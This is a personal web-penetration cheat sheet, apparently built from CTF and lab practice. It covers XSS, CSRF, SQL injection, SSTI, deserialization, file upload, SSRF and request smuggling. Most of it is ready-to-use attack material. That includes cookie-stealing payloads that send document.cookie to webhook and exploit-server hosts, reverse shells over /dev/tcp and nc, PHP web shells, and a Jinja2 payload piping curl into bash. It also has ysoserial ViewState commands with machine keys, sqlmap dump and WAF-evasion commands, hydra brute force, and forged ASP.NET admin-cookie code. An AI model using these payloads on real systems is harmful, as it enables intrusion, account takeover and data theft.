# Web Penetration **Basic Information** Check List: https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology [Portswiger WebSecurity-WriteUP](/6XUFmwPkRAeVHV39XUS6oA) **Useful Browser extensions** - Wappalyzer - X-Forwarded-For - Edit Cookie - DotGit (.git leak) Check | git-dumper (download code) Public Server to testing out band request ! https://webhook.site # WAF Bypass ## Fuzzing Filtered char Wordlist: /usr/share/seclists/Fuzzing/special-chars.txt ``` ffuf -request-proto http -request req1 -w /usr/share/seclists/Fuzzing/special-chars.txt -t 1 ``` Match Forbidden Response ``` ffuf -request-proto http -request req1 -w /usr/share/seclists/Fuzzing/special-chars.txt -mc 403 ```  ## Limite Request https://github.com/assetnote/nowafpls?tab=readme-ov-file#documented-waf-limitations ## No spaces ``` %20 %09 %0D %0C %0B %0A %A0 ``` ``` ls${IFS}-la echo${IFS}meowkkkkkkkkkkk cat${IFS}/*fla* ``` ## Emoji obfuscation https://book.hacktricks.xyz/pentesting-web/unicode-injection#emoji-injection https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209 💋 -> d"Y'< 💛 -> d"Y'> //-> remote d"Y' as JS ``` 💋img src=x onerror=alert(document.domain)//💛 ```  ``` 💋img/src=x onerror=alert(document.domain)//💛 💋svg/onload=alert`document.domain`//💛 💋iframe/src=javascript:alert`1`//💛 ``` ## SQLI injection ### Base64 https://www.ifreesite.com/unicode-ascii-ansi.htm Vuln: PHP / Json Decode ``` ' -> \u27 ' -> \u027 ' -> \u0027 ``` ## XSS ### Between Tags #### HTML ```htmlembedded= <svg/onload=alert(/xss/)> <img src="not_exist" onerror="alert(1)"> <img/src/onerror=alert(1)> <svg onload=&#x70;&#x72;&#x6f;&#x6d;&#x70;&#x74;()></svg> <svg onload="&#97;&#108;&#101;&#114;&#116;(1)"></svg> <link rel=attachment href="http://attacker.com"> ``` **Multiple Zero** ```html <svg onload=&#x000000000000070;&#x0000000072;&#x000006f;&#x6d;&#x70;&#x74;()> <svg onload="&#00000000000000000000000000000000000000000097;&#108;&#101;&#114;&#116;(1)"></svg> ``` #### Unicode ```html <svg onload=prompt()></svg> <svg onload=\u0070\u0072\u006f\u006d\u0070\u0074()></svg> ``` Work ### IN URL atob() -> base64 Decode function ``` atob`ZG9jdW1lbnQud3JpdGUoIjxoMT5UaGlzIGlzIHRlc3Q8L2gxPiIp` ``` ``` Payload: <img src=1 onerror=alert("Hello")> Base64 encoded: 'PGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KCJIZWxsbyIpPg==' URL: ?redirect=javascript:atob`PGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KCJIZWxsbyIpPg==` ``` # XSS Leverage: User trust website (NO Vulnerable !) - url parameter - url filepath - post data - HTTP headers Note: if the browser encoding the input before process the data, the XSS attack may didn't work!! ## xsstrike (Auto) **Useful options** `--proxy` -> default 0.0.0.0 8080 ``` python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/?search=123 --proxy ``` `--crawl` ``` python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/ --crawl --level 4 ``` ### Single Endpoint GET ``` python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/?search=123 --proxy ``` Post ``` python xsstrike.py -u "0a110090043fe54f816f7650004e00c4.web-security-academy.net/product?productId=1" --data "q=query" ``` DOM -> u -> Vuln Code !(js)  ### Testing Blind XSS Config /core/config.py  --blind inject blind XSS payload while crawling ``` #GET (Work) Post Note Work -> Manual ! python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind ``` ### History ``` python xsstrike.py --seeds urls.txt python xsstrike.py -u "http://example.com" -t 10 --crawl --levl 3 ``` ## HTML Attributes ```html #Tags Close "><script>alert(document.domain)</script> #search bar! (most !) "><iMg src=meow onerror=&#00000000000000000000000000000000000000000097;&#108;&#101;&#114;&#116;`meow`> ``` ``` #Attribute Close padding' autofocus onfocus=alert(document.domain) x='padding padding" autofocus onfocus=alert(document.domain) x="padding padding" autofocus onfocus=prompt`document.domain` x="padding "123%0aaUtofocUS%0aONFOcUS=prompt('testing')`` ## Option Tags padding" onclick=alert(1) x="padding #Link Tags Exploit 'accesskey='x'onclick='alert(1) ?'accesskey='x'onclick='alert(1) User Triiger Exploit ALT+SHIFT+X CTRL+ALT+X Alt+X ``` IF src attribute is controllable! ``` javascript:promt(/xss/) javascript:window.location=//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174 ``` ## Between the Tag ### Testing html tags ! (some tags not work !) ``` <b>meowhecker</b> <s>meowhecker</s> <hTML%0DoNPOInTeREnTEr%0D=%0Da=prompt,a()%0Dx> <DEtAiLS%09oNPOiNTerenTeR%0A=%0Aa=prompt,a()%0Dx>3nd </tiTLe><HtMl%09OnmoUseoVer%0d=%0d["nics113pt36507"].find(confirm)// <iframe src=javascript:document.cookie;alert(1)></iframe> <iframe src="<?php echo htmlspecialchars($_GET['src']) ?>"> #https://vul.com?src=javascript:alert(1) window.location = 'javascript:alert(1)' <a href=javascript:alert(1)>click Me</a> ``` ### Closs Tags (/select,/options) select,options ``` </option></select><DEtAiLS%09oNPOiNTerenTeR%0A=%0Aa=prompt,a()%0Dx>3nd ``` ### Load Remote HTML or Script (Blind XSS) ```htmlembedded= #Identify <img src=//webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e?XsS onerror=prompt();> <meta http-equiv="refresh" content="0; url=https://webhook.site/8ebdbec3-2440-4902-a029-09b70c44adaf/index.html"> <script src=http://webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e/csrf.js></script> <img src="meowhecker" onerror="document.write('<script src="https://webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e"></script>')"/> ``` ## XSS in Javascipt context ### Break js String Close Script tags (<,> work) ``` #Firefox, Chrome </script><img/src=1 onerror=alert`document.domain`> #Chrome </SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()// <DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt(document.domain),a()// ``` if (' or " work), '<' be filtered! ``` '-alert(1)-' ';alert(document.domain)// '-document.write("<s>Meowhecker</s>")-' #bypass (not allow ') &#x27;-alert(1)-&#x27; &apos;-alert(1)-&apos; &#x27;-document.write("<s>Meowhecker</s>")-&#x27; ``` ### Javascript template XSS vuln code ``` var name = `source can control` //jvascript template ``` exploit ``` ${alert(document.domain)} ``` ### Steal Cookie ``` javascript:window.location="//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174?a="+btoa(document.cookie) <iframe src=javascript:window.location="//p7xye7qy9fvyogvam896eah4hvnmbcz1.oastify.com?a="+btoa(document.cookie)></iframe> <svg onload=document.location='//exploit-0a9500bb032c0b9680c634b101d400fc.exploit-server.net/exploit?log='+btoa(document.cookie)></svg> <script>window.location.href = "https://exploit-0a9c0098048473df859011c101d70033.exploit-server.net/exploit?log=" + document.cookie;</script> <img src=//p5vt8fwjrjs5w7b0c8bcmkivhmndb3zs.oastify.com?image onerror=fetch(`//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174/?A=${encodeURIComponent(document.cookie)}`);> ``` ``` var link = document.createElement('meta'); link.httpEquiv = 'refresh'; link.httpEquiv = '1; //mwoehcker.com?a='+document.cookie; document.getElementsByTagName('head')[0].appendChild(link); ``` not Varify ## IN url -> HTTP Protocol ```html javascript:&#x5c;u0061lert`1` javascript:\u{00000000000000000000061}\u006c\u0065\u0072\u0074`1` ``` # XSRF leverage: Server trust user behavior ## Exploit -CSRF Change password Basic (work) ```html <html> <body> <form action="http://login.worldwap.thm/change_password.php" method="POST"> <input type="hidden" name="new_password" value="meowmeow" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` URL bypass (Work) ```html <html> <body> <form id="myForm" method="POST"> <input type="hidden" name="new_password" value="meowmeow" /> </form> <script> var form = document.getElementById("myForm"); var actionUrl = atob("aHR0cDovL2xvZ2luLndvcmxkd2FwLnRobS9jaGFuZ2VfcGFzc3dvcmQucGhw"); form.setAttribute("action", actionUrl); form.submit(); </script> </body> </html> ``` ## Favicon (Detect Framework) https://wiki.owasp.org/index.php/OWASP_favicon_database ``` wget <favicon> | md5sum ``` # CMS Scanner ## CMS Scanner (General) https://github.com/Tuhinshubhra/CMSeeK ## wpscan Wordpress Scanner *Enumerate* ``` wpscan --url internal.thm/wordpress/ ``` **Exploit** (Authentication Bypass) Work 5.4.2 ``` wpscan --url $TARGET_DOMAIN/wordpress//wordpress/ --passwords rockyou.txt --usernames admin --max-threads 50 ``` https://github.com/wpscanteam/wpscan ## joomscan Scanner https://github.com/OWASP/joomscan # Authentication Bypass ## List of Login bypass https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass ## Brute-Force Attack [Remote Brute Force Login](/ngZz3rf5QMyfW_8cIGJHKw) Base Response Time (UserName Enumerate) - Set long password (50~100 char) ### Defense Mechanism - IP block - Account Limit - Rate limit ### Bypass #### IP-Block ``` X-Forwarded-For:x ``` - Reset Mechanism ! https://raw.githubusercontent.com/Meowheckerrr/WebSecurity/main/ToolsDev/AddingValidStringToWordlist/addingValidBypassIpBlock.py #### Account limit Way1 - Spray password Step1 Enumerate -> User list (response) Step2 Decide a very small shortlist of passwords, it have to small then attempt limit. Way2 - Credential stuffing attacks ### User Name Enumerate - Forget Password - Login Page - Lock Account Mechanism ! -> Error Message ### Password Brute Force #### Post-Form Brute Force ```bash WEB_URL='/wp-login.php' PARAMETERS='log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.125.64%2Fwp-admin%2F&testcookie=1' hydra -l 'elliot' -P rockyou.txt $TARGET_IP http-post-form "$WEB_URL:$PARAMETERS:The password you entered for the username" -vV -t 10 ``` #### HTTP Basic Authentication Login Methods ``` http://username:password@HOST_DOMAIN_ADN_IP ```  ``` Authorization: Basic base64('username:password') ```  ``` hydra -l 'admin' -P rockyou.txt -s 80 $TARGET_IP http-get $WEB_URL -v ``` # HTTP Header Bypass ## Rewrite Ip Source & Rewrite Request path https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/special-http-headers#headers-to-change-location Request Forwarding Header ``` X-Original-URL X-Rewrite-URL ``` # Access Control ## Method Bypass Original Request ``` POST /admin-roles username=carlos&action=upgrade ``` Exploit ``` POSTA /admin-roles?username=wiener&action=upgrade ``` Work Flawed Check - Unprotected URL - Parameter-Base Flaws - URL-Base Access Control (Proxy) & HTTP Header Bypass - Proxy and Framework URL-Matching Discrepancies - Method-Bases - Flaws # LDAP Injection https://129538173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-a58ea2462cf2b98a868750b068a00fa32ccb807b%2FEN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf?alt=media  ## Auth Bypass normal filter query ``` (&(USER=admin)(PASSWORD=pass)) ``` Bypass ``` admin)(&)) ``` ## Information disclosure Normal Filter query ``` (|(type=Object1)(type=Object2) ``` malicious (inject -> Object1) ``` computer)(uid=*) ``` # Command Injection ## paylod  ``` `sleep 5` ``` ## Bash Shell  (Default Cmd) + (Inject point) ```bash () { :; }; sleep 10 or () { :; }; ping 127.0.0.1 -c 10 or () { :; }; curl http://ik63y1ea94vws1xaeeo2ujwspjvaj87x.oastify.com ``` ## CLI no space ## RevShell linux ``` echo "bash -i >& /dev/tcp/10.10.14.12/443 0>&1" > revshell python3 -m http.server 80 ``` ``` curl http://10.10.14.12/revshell -o /tmp/revshell bash /tmp/revshell ``` # NoSQL injection Table -> collection Records -> document Normal Query ``` db.handgun.find({"owner":"meowhecker"}) ``` # SQL Injection ## Filter Bypass XML Obfuscation ``` 1 UNION SELECT null-- - 1 &#x55;&#x4e;&#x49;&#x4f;&#x4e;&#x20;&#x53;&#x45;&#x4c;&#x45;&#x43;&#x54;&#x20;&#x6e;&#x75;&#x6c;&#x6c;&#x2d;&#x2d;&#x20;&#x2d; ``` Work ## Manual Exploit **Show Tables** ``` union select table_name from information_schema.tables-- - ``` Work **Show Columns (specify tables)** ``` union select column_name from information_schema.columns where table_name='users'-- - ``` **Retrieve Data ** ``` union select username || '~' || password from users UNION SELECT CONCAT(email, '|', password, '|', username) AS meow FROM users ``` Work ## SQLIMAP https://github.com/sqlmapproject/sqlmap https://www.geeksforgeeks.org/use-sqlmap-test-website-sql-injection-vulnerability/ waf-bypass (reference) https://www.vaadata.com/blog/exploiting-an-sql-injection-with-waf-bypass/ Default Agent: -> ``` sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org) ``` ### Useful Options **--random-agent** **--tamper** Encoding payload Scripts https://muhdaffa.medium.com/tips-and-tricks-for-effective-sql-injection-testing-using-sqlmap-tamper-scripts-ed4bfa5717e7 F5 bypass e.g. unicode Bypass ``` sqlmap -r req --tamper=charunicodeescape -p user -t 10 --dbs ``` **--delay** Prevent be filtered by Limit Rate (WAF) Impotant ``` -- delay 1 -- delay 3 (stable) -- delay 5 (stable) ``` **--proxy** we can specify the traffic through the burp proxy **--level 5 --risk 3** Best-effort try paylod **--batch** Default answer to any prompt **--dbs** fetch Database Name **--dump-all** Dump all **--exclude-sysdbs** Avoid the extraction of system databases. **--ignore-timeouts** ignore timeout connection ! **--threads** ### BASIC Usage: ``` # NO Waf Case sqlmap -r req --dbs --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 -p d sqlmap -r req --random-agent --dbs --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --threads=10 #Waf Case sqlmap -r req --random-agent --tamper=charunicodeescape --delay 1 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 sqlmap -r req --tamper=charunicodeescape --delay 1 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dbs --exclude-sysdbs --dump-all sqlmap -r req --random-agent --tamper=charunicodeescape -p user --dbs --dbms=mysql --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --delay 3 sqlmap -r req1 --random-agent --tamper=charunicodeescape --delay 3 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dbs --exclude-sysdbs --dump-all ``` sqlmap -r req1.txt --risk=3 --level=5 --random-agent --dbs -p username More Example ``` sqlmap -u "http://10.10.249.47/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ``` Vulnerable Website -> http://10.10.249.47/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" Risk -> Deep level -> Complex Random-agent -> Enumerate Different User dbs -> Auto enumerate the type of database p -> Parameter (Vulnerable parameter ) ### Exploitation Task -> Find Admin credential Listing information -D -> DataBase -T -> Table Show tables ``` sqlmap -r apiTest.txt -D vn_admin --tables ``` Show columns ``` sqlmap -r apiTest.txt -D vn_admin -T fe_users --columns ``` Dump data ``` sqlmap -r apiTest.txt -D vn_admin -T fe_users -C password --dump ``` # Customize Temper Example ```python= #!/usr/bin/env python def dependencies(): pass def tamper(payload:str, **kwargs): CrucialString=[ 'DATABASE()','FROM','schema_name','INFORMATION_SCHEMA.SCHEMATA','table_name', 'INFORMATION_SCHEMA.TABLES','table_schema','column_name','INFORMATION_SCHEMA.COLUMNS' ] if payload: if 'UNION' in payload: payload=payload.replace('UNION','/*!--%20-%0AuNiOn%23a%0A*/') if payload.startswith('42 '): payload=payload.replace('42 ','42 and 0 ') for i in CrucialString: if i in payload: payload=payload.replace(i,f'/*!50000{i}%23a%0A*/') if '-- ' in payload: payload=payload.replace('-- ','--%20') return payload.replace(' ','/**/') ``` # Deserialize ## ASP.NET ### Exploit __VIEWSTATE Parameter Ref: https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter This parameter is used to management page and control data cross the web page, During the rendering of a page HTML. #### Case:1 EnableViewStateMac = True/False (?) ViewStateEncryptionMode = True web.confing (FUZZing) ``` <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" /> ``` Generate Payload notice -> Path ``` ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" ``` Work (not quote) ``` .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "ping 10.10.14.5" --generator=90AA2C29 --decryptionalg=AES --decryptionkey=B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9 --validationalg=SHA1 --validationkey=99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF --viewstateuserkey=SAltysAltYV1ewSTaT3 ``` Listener - Interface sudo tcpdump -ni tun0 icmp # SSTI Reference: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection Fuzzing - Engine Identify ``` ${{<%[%'"}}%\ <%=meowhecker%> {{6*9}} ${6*9} -> Error Meaage {{7/0}} ${7/0} ``` ## Plaintext context (Injected Expression) ERB (Template Engine) ``` <%= system("whoami") %> ``` Handlebars:https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#handlebars-nodejs (Blind RCE-Work ) ## Code context (Close Expression) Tornado (Template Engine) ``` "A" }} {{Exploit-Methods or Objects}} {{"B" "meowHead" }} {% import os %} {{os.system('whoami')}} {{"meowTail" ``` ## RCE Python - Jinja2 (Filter Bypass ) https://starlox.medium.com/hackthebox-iclean-writeup-cfc46f351353 ``` bash -i >& /dev/tcp/10.10.14.79/443 0>&1 ``` ``` {{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl 10.10.14.79:80/reshell | bash")|attr("read")()}} ``` # API Testing ## Bearer Token Auth Bypass CSRF require Bearer Token 认证：客户端明确在请求中设置 Authorization 标头，包含 Bearer Token。因为浏览器不会自动附加这些标头，攻击者无法利用用户的身份发送未经授权的请求。 Bearer Token 是一种安全的认证方式，可以有效避免 CSRF 攻击 Delete Cookie -> Using Bearer Token to verify ! ``` POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1 Host: teamcity.runner.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.VHNYZVRNS0t3UWlkeXVEeklQSUFUVDJWTk1j.YjhjYTIyZTEtNTQwNi00ZjQ5LWJmOTEtNjkyODkwNTUxYTQx Connection: close ``` # Fuzzing Tools List -> ffuf -> BurpSuite Professional Document-> ffuf Fuzzing multiple location https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html#fuzzing-multiple-locations (Wait to read) ## Hide Parameters When we found the sensitive php .asp Program page, page return -> blank or Parameter Missing ### Arjun (Tools - Recommend !) ``` arjun -u http://internal.analysis.htb/users/list.php ``` ## Valid Extensions ``` ffuf -request-proto http -request req -w /usr/share/seclists/Fuzzing/extensions-most-common.fuzz.txt ``` # Path Traversal ``` http://meowhecker.com/index.php?file="filePath" ``` Fuzzing **Linux** ``` /etc/passwd ../etc/passwd ../../etc/passwd ../../../etc/passwd ../../../../etc/passwd ``` **Windows** Fuzzing List ! wget https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/dirTraversal-win.txt wget https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt (Found - 1) -win.ini ``` ffuf -request-proto https -request req -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fs 15 ffuf -request-proto http -request req -w ./dirTraversal-win.txt -fs 15 ``` ## Exploit - Windows https://gist.github.com/SleepyLctl/823c4d29f834a71ba995238e80eb15f9 - hMailServer (UserName,password) C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini # File Upload Extension wordlist /usr/share/wordlists/dirb/extensions_common.txt Check What kind of filter on upload page ## Bypass ### content type Check  Bypass content-Type check ! ``` Content-Disposition: form-data; name="file"; filename="shell.jpg.php" Content-Type: image/jpeg <?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.17.1.166 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?> ``` ### Extension check Multi extension ``` shell.jpg.php shell.php.jpg ``` Next step (Verify !) ``` shell.php%0a%0d.jpg shell.php%0d%0a.jpg shell.php .jpg shell.php%00.jpg shell.php/x00.jpg ``` (If work) Exploit ``` cp shell.php%0a%0d.jpg shell.php (Service will upload shell.php) ``` ## Magic String (Code Injection) Way1: PoC ``` exiftool -Comment="<?php echo 'START ' . phpinfo() . ' END'; ?>" ./Cat03.jpg -o JPGwithPHPinfo.php ```  ## HTTP verb (PUT) ``` PUT /images/exploit.php HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-httpd-php Content-Length: 49 <?php echo phpinfo(); ?> ``` ## Exploit - Read Sensitive File (shtm,shtml - SSI) Payload read.shtml ``` <!--#include file="web.config" --> <!--#include file="/web.config" --> ``` Real content in Source code ### Exploit WebShell RCE ### PHP PoC ``` <?php phpinfo(); ?> ``` web_sehll ``` <?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?> ``` ``` <?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.4.42.63 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?> ``` Windows XAMPP - Work # Cookie Crack ## ASP.NET (web.config) Check HTTP Runtime Tags  if computer didn't have specify version, we need to install the pack form microsoft Version: 4.6.1 https://www.microsoft.com/en-us/download/details.aspx?id=49978  Decryption Code https://github.com/liquidsec/aspnetCryptTools/blob/main/FormsDecrypt.cs Adding Reference - System.Web  Adding Machinekey to App.config(From repo) https://github.com/liquidsec/aspnetCryptTools/blob/main/app.config ```xml= <?xml version="1.0"?> <configuration> <system.web> <compilation debug="false" targetFramework="4.0" /> <machineKey validationKey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF" decryptionKey="B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9" validation="SHA1" decryption="AES" /> </system.web> </configuration> ```  Cracking .ASPXAUTH value   Modify user account -> Admin email ``` 1 nicstesting01@gmail.com 2024/5/17 下午 03:22:29 2024/5/17 下午 03:52:29 True test / ``` Analysis cookie Parameter https://learn.microsoft.com/en-us/dotnet/api/system.web.security.formsauthenticationticket.-ctor?redirectedfrom=MSDN&view=netframework-4.8#system-web-security-formsauthenticationticket-ctor(system-int32-system-string-system-datetime-system-datetime-system-boolean-system-string) version name issueDate expiration isPersistent userData ## Generate Admin Cookie Source Code https://github.com/liquidsec/aspnetCryptTools/blob/main/FormsEncrypt.cs  ```c sharp using System; using System.Web.Security; namespace FormsEncryptor { class Program { static void Main(string[] args) { // Take an existing forms cookie string encryptedTicket = "8A9A1063BAE0F9E7E881A908E4DEA1C4F2BC2DE8995DB401651CD6F653289C1BF05371D2FE6A5E412AE7C4F4BBEA9B630335576CA4E65DCA42CDBC8207A125E0CCD9CD6CDA0E6468D060DCB409F981F04CEEBAE7CB617E74DD3E3849CE3DA02A9C7201667D7DCF8956724E2572148192CD1F446ED28BC4601C24463280E6A20BF2530D31A67CD627172E504CC77F12374D7E8DDF "; string adminUsername = "admin@perspective.htb"; FormsAuthenticationTicket unencryptedTicket = FormsAuthentication.Decrypt(encryptedTicket); FormsAuthenticationTicket ticket = new FormsAuthenticationTicket( 1, adminUsername, //comment out if you want to change the username DateTime.Now, DateTime.Now.AddMinutes(1200000), // Add 120 minutes to expiry unencryptedTicket.IsPersistent, unencryptedTicket.UserData, "/" ); string encTicket = FormsAuthentication.Encrypt(ticket); Console.WriteLine(encTicket); Console.Read(); } } } ``` Admin Cookie ![Uploading file..._p4nje7v8x]()  # SSRF Hide Attacker Surface - Host Name,Request Path - External Entry (Exploit XXE to SSRF) - Reference Header Danger Function PHP ```php= file_get_contents curl_exec() fopen(),fread(),fclose() ``` Python ```python requests.get() , reqeusts.post() urllib.request.urlopen() ``` ASP ```c# ServerXMLHTTP Server.CreateObject("Msxml2.ServerXMLHTTP") ``` ## Bypass (blacklist) ## Tags Filter ``` <meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000"> ``` It will return the response via xml (we have to use source code to look at) ## Alternate 127.0.0.1 ``` 2130706433 017700000001 127.1 localtest.me customer1.app.localhost.my.company.127.0.0.1.nip.io 127.0.0.1.nip.io spoofed.burpcollaborator.net ``` or Case Work-!! IP to Integers Bypass block list https://www.browserling.com/tools/ip-to-dec ### Bypass filter via Open redirect - open redirect page - API (launch request from the we application )  ``` POT /stock (SSRF) api=/Open/Redirect/Page?path=http://127.0.0.1:8080 /product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin/delete?username=carlos (Work!) ``` ### Bypass White list Notice: Hash tags are double encoded to avoid be replace as null string ``` http://127.0.0.1#meow:meow@stock.weliketoshop.net http%3a//127.0.0.1%2523meow%3ameow%40stock.weliketoshop.net ``` Work # CMS penal TO RCE ## Typo3 Admin penal to RCE       ## Word Press Penal RCE Trigger web shell ``` http://$TARGET_IP/wp-content/themes/twentytwelve/404.php ``` ## HTTP Header ### Ip-Protection Bypass (IF website have proxy) X-Forwarded-For ``` curl -H "X-Forwarded-For:10.10.10.1" 127.0.0.1:3000 ``` # HTTP smuggling Request Exploit -> HTTP/1.1 (Work!) - Setting ``` Content-Length: Transfer-Encoding: chunked ``` Sove invalid Post request ``` Content-Type: application/x-www-form-urlencoded ``` ## CL-TE Vulnerability Identity Work ``` POST / HTTP/1.1 Host: 0a3300c1033290bc81a2c6af00dd00df.web-security-academy.net Content-Length: 15 Transfer-Encoding: chunked 0 meowhecker ``` Send Twice -> IF web site receive "MEOWHEKCERPOST" Vulnerability Detected !!! Time-base Detection (Work) ``` POST / HTTP/1.1 Host: 0a35008c04210c4984e9b02d00310030.web-security-academy.net Transfer-Encoding: chunked Content-Length: 4 1 F TEnotZeroToEnd ``` ## TE-CT Vulnerability Identity Work ``` POST / HTTP/1.1 Host: 0a9600b503329d258047eebb001c002d.web-security-academy.net Transfer-Encoding: chunked Content-Length: 2 4c POST /meowheckerAdminPennel HTTP/1.1 Content-Length: 200 meow=meowhecker 0 ```  Time Base-Detection Work ``` POST / HTTP/1.1 Host: 0a9600b503329d258047eebb001c002d.web-security-academy.net Transfer-Encoding: chunked Content-Length: 7 0 10 ``` ---  # HTML t0 PDF RCE : Reportlab eval() (Code Injection) Inject Point html color Attribute value passing attribute Value to eval Funtion! Defance Functions  # PHP HaSH https://www.cnblogs.com/haidragon/p/16845563.html